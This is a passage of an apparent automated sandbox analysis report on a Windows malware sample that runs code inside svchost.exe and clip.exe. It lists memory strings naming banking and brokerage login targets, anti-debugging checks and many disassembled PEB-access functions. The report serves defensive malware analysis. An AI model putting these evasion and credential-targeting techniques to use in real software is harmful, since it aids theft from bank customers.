            Source: 5-19-2H.5.drBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: 5-19-2H.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: 5-19-2H.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: 5-19-2H.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pageVMware20,11696494690*7i
            Source: 5-19-2H.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: 5-19-2H.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: 5-19-2H.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004172D3 LdrLoadDll,2_2_004172D3
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A3EAA2 BlockInput,0_2_00A3EAA2
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009F2622
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009C42DE
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009E4CE8 mov eax, dword ptr fs:[00000030h]0_2_009E4CE8
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_016E3068 mov eax, dword ptr fs:[00000030h]0_2_016E3068
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_016E30C8 mov eax, dword ptr fs:[00000030h]0_2_016E30C8
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_016E19F8 mov eax, dword ptr fs:[00000030h]0_2_016E19F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h]2_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h]2_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h]2_2_03BB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0634F mov eax, dword ptr fs:[00000030h]2_2_03C0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h]2_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h]2_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h]2_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov ecx, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h]2_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h]2_2_03BD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C062D6 mov eax, dword ptr fs:[00000030h]2_2_03C062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]2_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0625D mov eax, dword ptr fs:[00000030h]2_2_03C0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]2_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]2_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]2_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]2_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]2_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]2_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]2_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]2_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]2_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]2_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B280A0 mov eax, dword ptr fs:[00000030h]2_2_03B280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]2_2_03BC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]2_2_03B3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03B2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]2_2_03B720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03B2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]2_2_03B380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]2_2_03BB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]2_2_03BB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]2_2_03BC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]2_2_03B2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]2_2_03B2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]2_2_03BB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]2_2_03B5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]2_2_03B32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]2_2_03BB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]2_2_03B307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]2_2_03BE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]2_2_03BD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
